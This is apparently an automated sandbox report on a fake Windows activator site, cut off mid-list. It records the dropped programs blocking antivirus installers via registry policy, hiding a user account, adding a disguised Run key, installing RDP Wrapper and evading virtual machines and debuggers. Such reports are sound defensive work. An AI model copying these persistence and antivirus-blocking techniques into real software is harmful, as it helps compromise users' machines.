Analysis
-
max time kernel
751s -
max time network
752s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250410-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250410-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
19/04/2025, 20:52
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://kms-auto.site/windows-10-activator/
Resource
win10ltsc2021-20250410-en
General
-
Target
https://kms-auto.site/windows-10-activator/
Malware Config
Signatures
-
Rms family
-
Detected Nirsoft tools 2 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral1/files/0x00080000000282c9-1839.dat Nirsoft behavioral1/files/0x00080000000282d2-1855.dat Nirsoft -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ unsecapp.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ unsecapp.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ KMSTools Lite.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ KMSTools Lite.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ KMSTools Lite.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ KMSTools Lite.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ KMS.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ unsecapp.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ update.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ IP.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ smss.exe -
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 2452 cmd.exe 3932 net.exe 4968 net1.exe -
Blocks application from running via registry modification 28 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\19 = "eset_nod32_antivirus_live_installer.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\20 = "MBSetup.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\23 = "drweb-12.0-ss-win.exe" KMS.exe Set value (int) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\17 = "eset_internet_security_live_installer.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\22 = "bitdefender_avfree.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\24 = "Cureit.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\26 = "eset_smart_security_premium_live_installer.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "cureit.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\21 = "PANDAFREEAV.exe" KMS.exe Key created \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "KVRT.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\16 = "FRST64.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\18 = "esetonlinescanner.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\25 = "TDSSKiller.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "AVbr.exe" KMS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "AV_br.exe" KMS.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts update.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3268 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWinst.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion IP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion unsecapp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion KMSTools Lite.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion KMSTools Lite.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion KMSTools Lite.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion unsecapp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion unsecapp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion unsecapp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion KMSTools Lite.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion KMS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion unsecapp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion KMSTools Lite.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion KMSTools Lite.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion KMSTools Lite.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion IP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion unsecapp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion KMSTools Lite.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion KMS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion update.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation update.exe Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation smss.exe Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation install.exe -
Executes dropped EXE 21 IoCs
pid Process 344 KMSTools Lite.exe 4712 GSetup.exe 5232 install.exe 5576 7zaxxx.exe 1300 W10DigitalActivation.exe 1748 KMS.exe 5544 update.exe 1544 7zaxxx.exe 2748 Office Installer+_x64.exe 476 win.exe 5740 svchost.exe 5132 IP.exe 1968 smss.exe 6072 winserv.exe 5128 winserv.exe 4232 unsecapp.exe 3240 RDPWinst.exe 5680 unsecapp.exe 3728 winserv.exe 3620 winserv.exe 4424 unsecapp.exe -
Loads dropped DLL 3 IoCs
pid Process 1188 msedge.exe 468 msedge.exe 2116 svchost.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 3984 icacls.exe 5588 icacls.exe 3932 icacls.exe 4052 icacls.exe 4340 icacls.exe 2224 icacls.exe 4684 icacls.exe 1700 icacls.exe 1808 icacls.exe 5536 icacls.exe 5432 icacls.exe 5976 icacls.exe 4128 icacls.exe 2056 icacls.exe 2316 icacls.exe 480 icacls.exe 5976 icacls.exe 3240 icacls.exe 2772 icacls.exe 3192 icacls.exe 1836 icacls.exe 1356 icacls.exe 4456 icacls.exe 3184 icacls.exe 3304 icacls.exe 1588 icacls.exe 1140 icacls.exe 4104 icacls.exe 5168 icacls.exe 3984 icacls.exe 5904 icacls.exe 4008 icacls.exe 6020 icacls.exe 1260 icacls.exe 2096 icacls.exe 3936 icacls.exe 4556 icacls.exe 4392 icacls.exe 4612 icacls.exe 1756 icacls.exe 2444 icacls.exe 3152 icacls.exe 2200 icacls.exe 4136 icacls.exe 4616 icacls.exe 3508 icacls.exe 5264 icacls.exe 4732 icacls.exe 1344 icacls.exe 5332 icacls.exe 2868 icacls.exe 5988 icacls.exe 5952 icacls.exe 4888 icacls.exe 476 icacls.exe 4984 icacls.exe 1356 icacls.exe 5772 icacls.exe 5912 icacls.exe 6024 icacls.exe 6096 icacls.exe 5444 icacls.exe 5436 icacls.exe 1652 icacls.exe -
resource yara_rule behavioral1/memory/2560-891-0x00007FF641090000-0x00007FF641D3A000-memory.dmp themida behavioral1/memory/2560-892-0x00007FF641090000-0x00007FF641D3A000-memory.dmp themida behavioral1/memory/2560-894-0x00007FF641090000-0x00007FF641D3A000-memory.dmp themida behavioral1/memory/2560-893-0x00007FF641090000-0x00007FF641D3A000-memory.dmp themida behavioral1/memory/2560-895-0x00007FF641090000-0x00007FF641D3A000-memory.dmp themida behavioral1/memory/2560-896-0x00007FF641090000-0x00007FF641D3A000-memory.dmp themida behavioral1/memory/2560-897-0x00007FF641090000-0x00007FF641D3A000-memory.dmp themida behavioral1/memory/2560-898-0x00007FF641090000-0x00007FF641D3A000-memory.dmp themida behavioral1/memory/2560-900-0x00007FF641090000-0x00007FF641D3A000-memory.dmp themida behavioral1/memory/2936-964-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp themida behavioral1/memory/2936-965-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp themida behavioral1/memory/2936-967-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp themida behavioral1/memory/2936-968-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp themida behavioral1/memory/2936-966-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp themida behavioral1/memory/2936-970-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp themida behavioral1/memory/2936-969-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp themida behavioral1/memory/2936-971-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp themida behavioral1/memory/2936-973-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp themida behavioral1/files/0x000a000000028278-979.dat themida behavioral1/memory/344-990-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp themida behavioral1/memory/344-992-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp themida behavioral1/memory/344-994-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp themida behavioral1/memory/344-993-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp themida behavioral1/memory/344-991-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp themida behavioral1/memory/344-996-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp themida behavioral1/memory/344-995-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp themida behavioral1/memory/344-997-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp themida behavioral1/memory/344-999-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp themida behavioral1/memory/4264-1831-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp themida behavioral1/memory/4264-1833-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp themida behavioral1/memory/4264-1834-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp themida behavioral1/memory/4264-1832-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp themida behavioral1/memory/4264-1835-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp themida behavioral1/memory/4264-1837-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp themida behavioral1/memory/4264-1836-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp themida behavioral1/memory/4264-1838-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp themida behavioral1/files/0x00080000000282cc-1860.dat themida behavioral1/memory/1748-1876-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp themida behavioral1/memory/1748-1884-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp themida behavioral1/memory/1748-1885-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp themida behavioral1/memory/1748-1887-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp themida behavioral1/memory/1748-1886-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp themida behavioral1/memory/1748-1888-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp themida behavioral1/memory/1748-1882-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp themida behavioral1/memory/1748-1883-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp themida behavioral1/memory/4264-1890-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp themida behavioral1/memory/4264-1889-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp themida behavioral1/memory/1748-1895-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp themida behavioral1/memory/5544-1911-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp themida behavioral1/memory/4264-1912-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp themida behavioral1/memory/5544-1913-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp themida behavioral1/memory/5544-1915-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp themida behavioral1/memory/5544-1914-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp themida behavioral1/memory/5544-1916-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp themida behavioral1/memory/5544-1918-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp themida behavioral1/memory/5544-1917-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp themida behavioral1/memory/5544-1921-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp themida behavioral1/memory/4264-1922-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp themida behavioral1/memory/5544-1930-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp themida behavioral1/memory/4264-1935-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp themida behavioral1/memory/5544-2505-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp themida behavioral1/memory/4264-2522-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp themida behavioral1/files/0x0004000000027075-2765.dat themida behavioral1/files/0x0004000000027072-2775.dat themida -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" IP.exe -
Checks whether UAC is enabled 1 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA KMSTools Lite.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA KMS.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA update.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IP.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA smss.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA unsecapp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA unsecapp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA unsecapp.exe -
pid Process 4020 powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 278 ip-api.com -
Modifies WinLogon 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWinst.exe -
AutoIT Executable 57 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/memory/2560-894-0x00007FF641090000-0x00007FF641D3A000-memory.dmp autoit_exe behavioral1/memory/2560-893-0x00007FF641090000-0x00007FF641D3A000-memory.dmp autoit_exe behavioral1/memory/2560-895-0x00007FF641090000-0x00007FF641D3A000-memory.dmp autoit_exe behavioral1/memory/2560-896-0x00007FF641090000-0x00007FF641D3A000-memory.dmp autoit_exe behavioral1/memory/2560-897-0x00007FF641090000-0x00007FF641D3A000-memory.dmp autoit_exe behavioral1/memory/2560-898-0x00007FF641090000-0x00007FF641D3A000-memory.dmp autoit_exe behavioral1/memory/2560-900-0x00007FF641090000-0x00007FF641D3A000-memory.dmp autoit_exe behavioral1/memory/2936-967-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp autoit_exe behavioral1/memory/2936-968-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp autoit_exe behavioral1/memory/2936-966-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp autoit_exe behavioral1/memory/2936-970-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp autoit_exe behavioral1/memory/2936-969-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp autoit_exe behavioral1/memory/2936-971-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp autoit_exe behavioral1/memory/2936-973-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp autoit_exe behavioral1/memory/344-992-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp autoit_exe behavioral1/memory/344-994-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp autoit_exe behavioral1/memory/344-993-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp autoit_exe behavioral1/memory/344-996-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp autoit_exe behavioral1/memory/344-995-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp autoit_exe behavioral1/memory/344-997-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp autoit_exe behavioral1/memory/344-999-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp autoit_exe behavioral1/memory/4264-1833-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp autoit_exe behavioral1/memory/4264-1834-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp autoit_exe behavioral1/memory/4264-1835-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp autoit_exe behavioral1/memory/4264-1837-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp autoit_exe behavioral1/memory/4264-1836-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp autoit_exe behavioral1/memory/4264-1838-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp autoit_exe behavioral1/memory/1748-1884-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp autoit_exe behavioral1/memory/1748-1885-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp autoit_exe behavioral1/memory/1748-1887-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp autoit_exe behavioral1/memory/1748-1886-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp autoit_exe behavioral1/memory/1748-1888-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp autoit_exe behavioral1/memory/1748-1883-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp autoit_exe behavioral1/memory/4264-1890-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp autoit_exe behavioral1/memory/4264-1889-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp autoit_exe behavioral1/memory/1748-1895-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp autoit_exe behavioral1/memory/4264-1912-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp autoit_exe behavioral1/memory/5544-1915-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp autoit_exe behavioral1/memory/5544-1914-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp autoit_exe behavioral1/memory/5544-1916-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp autoit_exe behavioral1/memory/5544-1918-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp autoit_exe behavioral1/memory/5544-1917-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp autoit_exe behavioral1/memory/5544-1921-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp autoit_exe behavioral1/memory/4264-1922-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp autoit_exe behavioral1/memory/5544-1930-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp autoit_exe behavioral1/memory/4264-1935-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp autoit_exe behavioral1/memory/5544-2505-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp autoit_exe behavioral1/memory/4264-2522-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp autoit_exe behavioral1/memory/1968-2787-0x00007FF64E820000-0x00007FF64F853000-memory.dmp autoit_exe behavioral1/memory/1968-2790-0x00007FF64E820000-0x00007FF64F853000-memory.dmp autoit_exe behavioral1/memory/1968-2789-0x00007FF64E820000-0x00007FF64F853000-memory.dmp autoit_exe behavioral1/memory/1968-2791-0x00007FF64E820000-0x00007FF64F853000-memory.dmp autoit_exe behavioral1/memory/1968-2786-0x00007FF64E820000-0x00007FF64F853000-memory.dmp autoit_exe behavioral1/memory/1968-2788-0x00007FF64E820000-0x00007FF64F853000-memory.dmp autoit_exe behavioral1/memory/4264-2792-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp autoit_exe behavioral1/memory/5544-2793-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp autoit_exe behavioral1/memory/4264-3251-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp autoit_exe -
Drops file in System32 directory 7 IoCs
description ioc Process File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI powershell.exe File created C:\Windows\SysWOW64\unsecapp.exe IP.exe File opened for modification C:\Windows\SysWOW64\unsecapp.exe IP.exe File created C:\Windows\System32\rfxvmt.dll RDPWinst.exe File opened for modification C:\Windows\System32\GroupPolicy powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini powershell.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol powershell.exe -
Hide Artifacts: Hidden Users 1 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" reg.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
pid Process 2560 KMSTools Lite.exe 2936 KMSTools Lite.exe 344 KMSTools Lite.exe 4264 KMSTools Lite.exe 1748 KMS.exe 5544 update.exe 5132 IP.exe 1968 smss.exe 4232 unsecapp.exe 5680 unsecapp.exe 4424 unsecapp.exe -
Drops file in Program Files directory 52 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft JDX update.exe File opened for modification C:\Program Files (x86)\AVAST Software update.exe File opened for modification C:\Program Files\Common Files\Doctor Web update.exe File opened for modification C:\Program Files\Common Files\McAfee update.exe File opened for modification C:\Program Files\Loaris Trojan Remover update.exe File opened for modification C:\Program Files (x86)\IObit\Advanced SystemCare update.exe File opened for modification C:\Program Files (x86)\Moo0 update.exe File created C:\Program Files\Common Files\System\iediagcmd.exe update.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab update.exe File opened for modification C:\Program Files\Cezurity update.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus update.exe File opened for modification C:\Program Files\Process Lasso update.exe File opened for modification C:\Program Files\Process Hacker 2 update.exe File opened for modification C:\Program Files\EnigmaSoft update.exe File opened for modification C:\Program Files\QuickCPU update.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWinst.exe File opened for modification C:\Program Files (x86)\SpyHunter update.exe File opened for modification C:\Program Files\AVAST Software update.exe File opened for modification C:\Program Files (x86)\Transmission update.exe File opened for modification C:\Program Files\RogueKiller update.exe File opened for 